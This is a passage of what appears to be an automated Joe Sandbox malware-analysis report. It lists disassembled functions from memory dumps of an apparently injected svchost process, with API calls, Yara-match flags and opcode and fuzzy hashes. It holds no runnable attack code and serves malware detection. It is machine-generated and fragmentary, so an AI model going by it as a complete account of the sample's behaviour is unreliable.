                                                                                                              APIs
                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 02583C9F
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583CDA
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 02583D25
                                                                                                              • WSAGetLastError.WS2_32(?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583D5B
                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583D82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 316788870-0
                                                                                                              • Opcode ID: dc8182892369a6443067befa9cbbb9e9f163f19b2cc9ae412bd06d6db00bcce2
                                                                                                              • Instruction ID: 76826897c436e88229414aba869b12870db330bbfb6ecb15569c7f635949f91e
                                                                                                              • Opcode Fuzzy Hash: dc8182892369a6443067befa9cbbb9e9f163f19b2cc9ae412bd06d6db00bcce2
                                                                                                              • Instruction Fuzzy Hash: AD314E72605200AFEB14BF68D4C87693BA9FF84714F5104A6FE05EB245F7B0D890CB58
                                                                                                              Function 04DF3CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 04DF3CBF
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3CFA
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 04DF3D45
                                                                                                              • WSAGetLastError.WS2_32(?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3D7B
                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3DA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 316788870-0
                                                                                                              • Opcode ID: 60a5dc0ad81527486c57a21d27def84f7d17699d691450ff5cd81946b83af2d5
                                                                                                              • Instruction ID: 371f01bff7d2f3543ead44c6e70bc26df506457a48b2c6f0ea5c559bf110308d
                                                                                                              • Opcode Fuzzy Hash: 60a5dc0ad81527486c57a21d27def84f7d17699d691450ff5cd81946b83af2d5
                                                                                                              • Instruction Fuzzy Hash: 1E31A1726042009BFB749F68DCC876A7769FB84324F030166EE09DB299E675F8918A51
                                                                                                              Function 0258E6C7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0258E6D5
                                                                                                                • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
                                                                                                                • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
                                                                                                                • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
                                                                                                              • _free.LIBCMT ref: 0258E6E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1020059152-0
                                                                                                              • Opcode ID: 953af04c32644784617986493a5739cc4e6d7c90934d9ca954342bbd50c83fba
                                                                                                              • Instruction ID: e0caeb404406aad340493fef7ab2ebcfcafc8a2df9a40b14dd7904d0b77ec23d
                                                                                                              • Opcode Fuzzy Hash: 953af04c32644784617986493a5739cc4e6d7c90934d9ca954342bbd50c83fba
                                                                                                              • Instruction Fuzzy Hash: 2A11A7329446266BCB223F75E8057693BB6BB843E0B614925F585FA140EBF4C8508B9C
                                                                                                              Function 02A06CC8 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 955811338-0
                                                                                                              • Opcode ID: e127df09e7e4ed3b17ef2ac8311b2479d6dd24b67fd4341831bcc196f5df1968
                                                                                                              • Instruction ID: 62a89b658acced8e71aa125926099fbc768f891f0d2e23914c1aa526b2ffd9ca
                                                                                                              • Opcode Fuzzy Hash: e127df09e7e4ed3b17ef2ac8311b2479d6dd24b67fd4341831bcc196f5df1968
                                                                                                              • Instruction Fuzzy Hash: 8C110C321447066FEB21AFA5FDC0D9B77DDEF44B78B004029FA148A1D0DF71D8218A60
                                                                                                              Function 04C7F438 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 955811338-0
                                                                                                              • Opcode ID: 3c638c45730fe09817bc96cf6e3138b2a69ebc17fb14daba0e7deb7c5ce5773d
                                                                                                              • Instruction ID: 84650a82d277844c7523695956ca283f77b596c8e9de6e0fccb2d323649bd53c
                                                                                                              • Opcode Fuzzy Hash: 3c638c45730fe09817bc96cf6e3138b2a69ebc17fb14daba0e7deb7c5ce5773d
                                                                                                              • Instruction Fuzzy Hash: 2B1125322407466FFB10FFA4DC8099B37EAEF00738B10402DFA1486150DB71E401A6B0
                                                                                                              Function 02582BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02582BFF
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02582C15
                                                                                                              • TranslateMessage.USER32(?), ref: 02582C24
                                                                                                              • DispatchMessageW.USER32(?), ref: 02582C2A
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02582C38
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2015114452-0
                                                                                                              • Opcode ID: 832bb620a72bff0239dea6347796be8a854e3c0ccd1bb0e8d86deffc148a3f2d
                                                                                                              • Instruction ID: 77cca40c27e3d6ecf516be03ccd40b8bc5ea6a7490174f2e5bf0910fe2e4a670
                                                                                                              • Opcode Fuzzy Hash: 832bb620a72bff0239dea6347796be8a854e3c0ccd1bb0e8d86deffc148a3f2d
                                                                                                              • Instruction Fuzzy Hash: 0E01A972A8430976E610AAA49C51FBA7BACFB04B10F504911FF04FB0C4DBE0E4159BBC
                                                                                                              Function 04DF2C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04DF2C3F
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04DF2C55
                                                                                                              • TranslateMessage.USER32(?), ref: 04DF2C64
                                                                                                              • DispatchMessageW.USER32(?), ref: 04DF2C6A
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04DF2C78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2015114452-0
                                                                                                              • Opcode ID: e68fbeba720b217d5c0de176bcd2516d170b0fad8beddecb57ed7ac8e9a0cf72
                                                                                                              • Instruction ID: 1535474fc9d451a86299a88c094aea24de69f057ac677185df3a1c7ecfb3806d
                                                                                                              • Opcode Fuzzy Hash: e68fbeba720b217d5c0de176bcd2516d170b0fad8beddecb57ed7ac8e9a0cf72
                                                                                                              • Instruction Fuzzy Hash: 41018B7679031976E620AA959C82FFA776CEB04B10F514551FB04EA0C4E6A6FC4187A4
                                                                                                              Function 02A13160 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 02A13188
                                                                                                                • Part of subcall function 02A12D18: __getptd.LIBCMT ref: 02A12D26
                                                                                                                • Part of subcall function 02A12D18: __getptd.LIBCMT ref: 02A12D34
                                                                                                              • __getptd.LIBCMT ref: 02A13192
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __getptd.LIBCMT ref: 02A131A0
                                                                                                              • __getptd.LIBCMT ref: 02A131AE
                                                                                                              • __getptd.LIBCMT ref: 02A131B9
                                                                                                                • Part of subcall function 02A12DBD: __CallSettingFrame@12.LIBCMT ref: 02A12E09
                                                                                                                • Part of subcall function 02A13286: __getptd.LIBCMT ref: 02A13295
                                                                                                                • Part of subcall function 02A13286: __getptd.LIBCMT ref: 02A132A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282538202-0
                                                                                                              • Opcode ID: cd5fa55f7bbf90f2a481e1fc654e7c437620c89a58453831d0692201638dd461
                                                                                                              • Instruction ID: 209885e70381a1da724a2434c2ee7c6b07ffcf576f97e342415ea7455f7f14f7
                                                                                                              • Opcode Fuzzy Hash: cd5fa55f7bbf90f2a481e1fc654e7c437620c89a58453831d0692201638dd461
                                                                                                              • Instruction Fuzzy Hash: D811D771C4030ADFDF01EFA4D684AEEBBB1FF08310F5184AAE814A7291DB389A159F51
                                                                                                              Function 04C90FCD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 04C90FF5
                                                                                                                • Part of subcall function 04C90AD4: __getptd.LIBCMT ref: 04C90AE2
                                                                                                                • Part of subcall function 04C90AD4: __getptd.LIBCMT ref: 04C90AF0
                                                                                                              • __getptd.LIBCMT ref: 04C90FFF
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __getptd.LIBCMT ref: 04C9100D
                                                                                                              • __getptd.LIBCMT ref: 04C9101B
                                                                                                              • __getptd.LIBCMT ref: 04C91026
                                                                                                                • Part of subcall function 04C90B79: __CallSettingFrame@12.LIBCMT ref: 04C90BC5
                                                                                                                • Part of subcall function 04C910F3: __getptd.LIBCMT ref: 04C91102
                                                                                                                • Part of subcall function 04C910F3: __getptd.LIBCMT ref: 04C91110
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282538202-0
                                                                                                              • Opcode ID: c4ab0ca85f11a50824452c04bd077c01b724c7d79dcaa01a3b92a2a9b6c3820e
                                                                                                              • Instruction ID: 1e60b0f34d4f7dda4ecfd3fe4c721f0b9be73135e378cbe8e573041fea4d8dd3
                                                                                                              • Opcode Fuzzy Hash: c4ab0ca85f11a50824452c04bd077c01b724c7d79dcaa01a3b92a2a9b6c3820e
                                                                                                              • Instruction Fuzzy Hash: C011ECB1D00249EFEF00EFA5D549ADE7BF1FF04718F14906AE814A7260DB39A915AF50
                                                                                                              Function 02584B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02584B63
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02584B6D
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02584B80
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02584B83
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3168844106-0
                                                                                                              • Opcode ID: 11196bebbdaee543a7776a99a6f036a3c035ee080f5bbf451dd2ffe0cf8597e2
                                                                                                              • Instruction ID: f9eab04b39693fe3443519ad0f155c78550ad132bdc78804a2eb2886fb67c8b5
                                                                                                              • Opcode Fuzzy Hash: 11196bebbdaee543a7776a99a6f036a3c035ee080f5bbf451dd2ffe0cf8597e2
                                                                                                              • Instruction Fuzzy Hash: A101A776A006149FD720EF35FCC4B6BB7E8FB88325F414819E50693100D774F8599BA4
                                                                                                              Function 02A0DBFC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02A0DC08
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __getptd.LIBCMT ref: 02A0DC1F
                                                                                                              • __amsg_exit.LIBCMT ref: 02A0DC2D
                                                                                                              • __lock.LIBCMT ref: 02A0DC3D
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 02A0DC51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              • Opcode ID: d5dfd9dae79135417da2e060ef49d66a69c3cad8e15227165571327f1c3874f3
                                                                                                              • Instruction ID: 8d405e8082b630085ed73c20d0d7be3861db9b6dad9adb9a98042624bc2bca8c
                                                                                                              • Opcode Fuzzy Hash: d5dfd9dae79135417da2e060ef49d66a69c3cad8e15227165571327f1c3874f3
                                                                                                              • Instruction Fuzzy Hash: 51F0B433980B159BE731BBB8BAC179E33E2EF05B24F114149D4446B1C1CF74A940CE96
                                                                                                              Function 04C84A15 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04C84A21
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __getptd.LIBCMT ref: 04C84A38
                                                                                                              • __amsg_exit.LIBCMT ref: 04C84A46
                                                                                                              • __lock.LIBCMT ref: 04C84A56
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 04C84A6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              • Opcode ID: 5c150a9902f4fd25278f1542d8bfe47033ff1f849b6f0a822676f2de4a12fdca
                                                                                                              • Instruction ID: e2afb0da321907e73e724cf5e8b5801943a84e6dd18a4f1866136fb043cad0ef
                                                                                                              • Opcode Fuzzy Hash: 5c150a9902f4fd25278f1542d8bfe47033ff1f849b6f0a822676f2de4a12fdca
                                                                                                              • Instruction Fuzzy Hash: 46F0F632900311DBF725FBA8580578E37A2BF00F2CF16511ED814AB1D0EB383A41A61D
                                                                                                              Function 0258E22F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 0258E23B
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __getptd.LIBCMT ref: 0258E252
                                                                                                              • __amsg_exit.LIBCMT ref: 0258E260
                                                                                                              • __lock.LIBCMT ref: 0258E270
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0258E284
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              • Opcode ID: a2c5579fe40faf4f7a717981b0801083bc896b67953d7aa2593437a343a7c78a
                                                                                                              • Instruction ID: fbed63627d19e4b11591b002bd4641d329be9676f1d82b0485256ae2e10710fa
                                                                                                              • Opcode Fuzzy Hash: a2c5579fe40faf4f7a717981b0801083bc896b67953d7aa2593437a343a7c78a
                                                                                                              • Instruction Fuzzy Hash: 5CF062329446059BE725BB64D40276D7BA27B81710F114209F452762D0CFE48541CE5E
                                                                                                              Function 04DF7600 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 04DF7622
                                                                                                              • GetCommandLineW.KERNEL32 ref: 04DF7628
                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 04DF7637
                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 04DF765F
                                                                                                              • ExitProcess.KERNEL32 ref: 04DF7667
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                              • String ID:
                                                                                                              • API String ID: 3421218197-0
                                                                                                              • Opcode ID: 143484e935993ecd71ccda4bac5ae6c521a09e3316ab9f90c61bb7fd41275371
                                                                                                              • Instruction ID: 3220e865ca084ae67b63e43931d0ea092316a90b3cb303c465ba7379c4e462c4
                                                                                                              • Opcode Fuzzy Hash: 143484e935993ecd71ccda4bac5ae6c521a09e3316ab9f90c61bb7fd41275371
                                                                                                              • Instruction Fuzzy Hash: A7F0B4716C4319BBF7209FA1DC4DFD97BB8EB04B02F100294BA19A60D4DA746E44CF54
                                                                                                              Function 0258728A Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 025883D0: _doexit.LIBCMT ref: 025883DC
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0258729C
                                                                                                                • Part of subcall function 025897C0: TlsGetValue.KERNEL32(00000000,02589919,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000), ref: 025897C9
                                                                                                                • Part of subcall function 025897C0: DecodePointer.KERNEL32(?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26,0000000D), ref: 025897DB
                                                                                                                • Part of subcall function 025897C0: TlsSetValue.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 025897EA
                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 025872A7
                                                                                                                • Part of subcall function 025897A0: TlsGetValue.KERNEL32(?,?,025872AC,00000000), ref: 025897AE
                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 025872BA
                                                                                                                • Part of subcall function 025897F4: DecodePointer.KERNEL32(?,?,?,025872BF,00000000,?,00000000), ref: 02589805
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 025872C3
                                                                                                              • ExitThread.KERNEL32 ref: 025872CA
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 025872D0
                                                                                                              • __freefls@4.LIBCMT ref: 025872F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 781180411-0
                                                                                                              • Opcode ID: b30954e1dca7aed80a754788db995e8e0621db742a2118bf4db8aaf206416032
                                                                                                              • Instruction ID: 0d7ed0a16b4a547d8533c89a7353ba2c3f9f5a1ef4afcd3793d174d2f06d8483
                                                                                                              • Opcode Fuzzy Hash: b30954e1dca7aed80a754788db995e8e0621db742a2118bf4db8aaf206416032
                                                                                                              • Instruction Fuzzy Hash: 6FE0923580010A679B113FB1C80897F7A5EBD87355B514810EA11F2101EBA4D5115A9E
                                                                                                              Function 02A051ED Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              • Opcode ID: 408e93eadc18e58a0a18ccf51f4dd5a5a2310e99909abbf038488dcdf646a61f
                                                                                                              • Instruction ID: 094ba7254e4e1f40423b320c4a309bdb3bf754750206feddeb474492903d91e8
                                                                                                              • Opcode Fuzzy Hash: 408e93eadc18e58a0a18ccf51f4dd5a5a2310e99909abbf038488dcdf646a61f
                                                                                                              • Instruction Fuzzy Hash: 3E4177B0A40318ABE724DBA0DCC4FAA77B9FF08704F50459DE64D9A1C0DBB19A848F54
                                                                                                              Function 04C7785F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              • Opcode ID: cabc150b080c4304c25066570c267da51fdbb20862e1b431869bc2572c7548db
                                                                                                              • Instruction ID: 055bc21e7f47cfbfabf311bcf5f00bc998f105763c6f80ab22783f548067081a
                                                                                                              • Opcode Fuzzy Hash: cabc150b080c4304c25066570c267da51fdbb20862e1b431869bc2572c7548db
                                                                                                              • Instruction Fuzzy Hash: 8441B8B1A01218AFEB20DB64DC95FDE77BDAB44704F1081D9E60DA61C1DB70AB85CF64
                                                                                                              Function 04DF9480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF949A
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
                                                                                                                • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF94D2
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
                                                                                                                • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                              • String ID: invalid string position$string too long
